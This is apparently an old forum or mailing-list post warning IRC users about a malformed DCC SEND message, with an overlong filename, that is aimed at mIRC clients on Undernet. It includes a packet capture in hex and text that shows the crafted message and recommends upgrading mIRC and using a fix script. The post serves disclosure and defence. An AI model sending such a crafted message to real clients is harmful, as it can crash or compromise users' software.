Hi all, just camed today at work and i started sniffing a bit using ngrep (http://www.packetfactory.net/projects/ngrep/), guess what i`ve got? Thousand of freaks (yeah of course Undernet) using this fake DCCs, but not only as private messages this has taken the following form /msg #channel DCC SEND "shit.... Well i`m making this public before it will extend into a IRC virus and i encourage all the "asl pls,10x and lamers like theese" to upgrade to mIRC 6.12 and operators of channels should get this script http://www.erler.org/Olathe/exploit%20fix.mrc, and of course modify it for autoban. (i`m too lazy to do it). Below it`s your beloved packet. T x.x.x.x:6667 -> x.x.x.x:1927 [AP] 3a 61 77 6a 66 64 67 61 64 21 73 74 31 40 xx xx :awjfdgad!st1@xx 2e xx xx 2e xx xx xx 2e xx xx 30 20 50 52 49 56 .xx.xxx.xxx PRIV 4d 53 47 20 4f 6d 69 4b 72 4f 6e 20 3a 01 44 43 MSG OmiKrOn :.DC 43 20 53 45 4e 44 20 22 61 20 61 20 61 20 61 20 C SEND "a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a 61 20 61 20 22 20 31 30 37 39 30 39 35 38 34 38 a a " 1079095848 20 36 36 36 01 0d 0a 666... I just cutted all the IPs just to keep it down. Greetings #linuxsecurity (Undernet).